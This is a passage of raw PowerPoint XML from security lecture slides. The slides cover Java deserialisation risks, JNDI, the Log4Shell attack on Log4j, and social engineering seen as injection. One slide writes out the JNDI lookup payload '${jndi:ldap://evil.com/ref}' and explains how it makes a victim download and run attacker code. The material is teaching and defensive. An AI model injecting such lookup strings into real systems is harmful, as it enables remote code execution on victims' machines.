              </a:rPr>
              <a:t>objectIn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ObjectInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fileIn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        s =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(Student) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>objectIn.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readObject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(); // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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deserialise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en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cast</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2177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br>
              <a:rPr lang="en-GB" sz="1633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1633" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can’t we only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> objects if they are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633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Student</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633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GB" sz="1633" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>objects?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Subtle issue: only after the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> do we know that type of object   we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633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GB" sz="1633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defTabSz="492074">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Countermeasure: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Look-Ahead Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to white-list which classes are allowed to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialised</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1633" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742873" lvl="1" indent="-285720" defTabSz="492074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 defTabSz="492074">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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defTabSz="492074">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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164" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{341B0781-9964-B226-EA61-61C9DC952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097D16C-212F-431B-BE46-E7162F9AF926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73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1361" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4084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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCB8E39A-D565-0FEE-4BB2-37EB77D0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48D8E-6A84-C4B2-C149-96589B1D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600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> van </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cooten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>chvancooten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, https://twitter.com/chvancooten/status/1469340927923826691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3188" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62B015F0-4A09-2CC7-7F61-0E3FEE370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E43263B4-33DF-4CFA-9BD7-953625D303B5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74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1361"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="93189" name="Afbeelding 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A80C6110-6D77-BCAA-BFCB-24A3C3CC3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" y="1044361"/>
            <a:ext cx="3189600" cy="25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Afbeelding 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{354FDFCB-144A-4E78-F5EA-B974782B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21" y="4425481"/>
            <a:ext cx="4792320" cy="6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Afbeelding 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{832D15B1-BCB3-CB3A-ABB0-7FE1F329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01" y="1269001"/>
            <a:ext cx="4638240" cy="18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92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078F5590-5FDB-3205-7194-A13AF95A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JNDI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000"/>
              <a:t>(Java Naming and Directory Interface)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55DEB-FB5E-B829-1194-380CBCC3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1633" dirty="0"/>
              <a:t>Common interface to interact with a variety of naming and directory services, incl. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CORBA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Naming service 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associates names with values aka bindings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provides lookup and search operations of objects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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Directory service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/>
              <a:t>special type of naming service for storing directory objects that can have attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0"/>
              <a:t>You can store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Java objects </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0"/>
              <a:t>in Naming or Directory service using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</a:rPr>
              <a:t>serialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. store byte representation of object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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</a:rPr>
              <a:t>JNDI references, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. tell where to fetch the object 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  <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rmi://server.com/reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ldap://server.com/reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514297" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Another option is to let a JDNI reference point to a (remote) factory class to create the object.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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4212" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82663BF7-6496-E64C-0389-EE5EBEFC3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97F6D133-7A38-4DB0-9EBB-7FFE3DDAF961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75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1361"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26355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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F4F94BC-F2E2-F1D0-6F5F-83F21B7B4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Log4J attack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B58EA-638D-61AA-42E0-89CDAF9A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en-GB" sz="1800" dirty="0"/>
              <a:t>Attacker provides some input that is a JDNI lookup pointing to their own server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 ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>://evil.com/ref}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>If that user input is logged, Log4j will retrieve the corresponding object from the attacker’s server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Attacker’s server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> can reply with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>a serialised object, which will be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>deserialised</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>a JNDI reference to another server hosting the class; JDNI looks up that reference, and downloads &amp; executes class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400008">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Attacker’s code runs on the victim’s machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114288" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>Alternatively, attacker can abuse gadgets available on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>ClassPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> on the victim’s machine.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457153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95236" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEC7382F-6DCE-EC8F-C2A2-83C6E8781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BF3F69A1-0589-43B5-975A-C4F31B7C5761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76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1361"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3125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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51075B6A-B833-1494-02AB-608E75188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data exfiltration using Log4J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AB7C84-5C4F-CCE8-C00B-69D2EF5A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81" y="1116361"/>
            <a:ext cx="7760160" cy="5264640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sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>https://news.sophos.com/en-us/2021/12/12/log4shell-hell-anatomy-of-an-exploit-outbreak/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96260" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2E7FDA3-7B79-CC3C-8FAC-2F3460D08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91048">
              <a:lnSpc>
                <a:spcPct val="116000"/>
              </a:lnSpc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 marL="741611" indent="-285124" defTabSz="491048">
              <a:lnSpc>
                <a:spcPct val="116000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="103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 marL="1141937" indent="-227523" defTabSz="491048">
              <a:lnSpc>
                <a:spcPct val="116000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="77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 marL="1599864" indent="-227523" defTabSz="491048">
              <a:lnSpc>
                <a:spcPct val="116000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="52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 marL="2056350" indent="-227523" defTabSz="491048">
              <a:lnSpc>
                <a:spcPct val="116000"/>
              </a:lnSpc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471076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885803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300529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715255" indent="-227523" defTabSz="491048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14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 typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{A54E663E-8669-4353-BCC1-86308E23D0AC}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1361"/>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1361"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="96261" name="Afbeelding 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{667BA64E-FFC3-B4C3-377E-E8A16C10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1" y="1269001"/>
            <a:ext cx="8003520" cy="450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13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Social Engineering as injection attacks?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forms of social engineering can be regarded as injection attacks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Attackers trick victims into executing some command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78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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068959"/>
            <a:ext cx="2441399" cy="3049173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 bwMode="auto">
          <a:xfrm>
            <a:off x="4885927" y="3212976"/>
            <a:ext cx="2736304" cy="1656184"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -63172"/>
              <a:gd name="adj2" fmla="val 4562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Grant me    a thousand </a:t>
            </a:r>
          </a:p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cs typeface="MV Boli" panose="02000500030200090000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>wishes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18215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CFE86EA-00AD-05C1-490C-4A5CB6E0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Two kinds of problems: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>bugs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> features</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="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137CEC22-F4A3-F07D-1A4A-E769D82DC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2053B9-F243-4C50-9A15-FD6A38BA96F9}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL">
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL">
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15364" name="TextBox 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE1EE47F-C787-C2F9-10BD-6AF163C8D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445" y="3545640"/>
            <a:ext cx="3425760" cy="7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14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(abuse of) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2177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a feature </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="254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215DF96-54D4-96BE-2A46-CE7E8E936A84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-129906" y="3405863"/>
            <a:ext cx="3792887" cy="6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2. Injection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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15366" name="Groep 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3721B7CF-A1C4-DBC4-B99F-0484389AE2FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="920161" y="4157642"/>
            <a:ext cx="6845760" cy="1877733"/>
            <a:chOff x="1184621" y="4348378"/>
            <a:chExt cx="7546827" cy="2069861"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15377" name="Afgeronde rechthoek 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C9560ED-C605-09AA-6205-C84F7ABAA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506" y="4618226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back-end service</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Explosie 2 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B7E9076-9CD5-E28F-D66B-6060186CE417}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6594715" y="5202367"/>
              <a:ext cx="1217588" cy="630174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A3C982C-5723-114C-574E-0CBB29254EA1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5816855" y="5357926"/>
              <a:ext cx="1133453" cy="42540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5380" name="Picture 2" descr="C:\Users\erikpoll\Desktop\.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DA1E3F0-AB73-5874-A37C-C3076D9FC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21" y="4760682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28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25CDB298-4380-2627-DF9B-E49CEE698793}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2437133" y="4973790"/>
              <a:ext cx="1077892" cy="2888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82" name="TextBox 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FBC4E34-8A67-99DD-72C6-BA0B1206C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75" y="4348378"/>
              <a:ext cx="1672928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65B3739-01DE-3913-F067-A5DEA171F1F5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6088312" y="5478564"/>
              <a:ext cx="157160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33BDD35-0774-9BA8-7BFB-4E26B2589320}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6313732" y="5478564"/>
              <a:ext cx="158747" cy="17778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5385" name="TextBox 29">
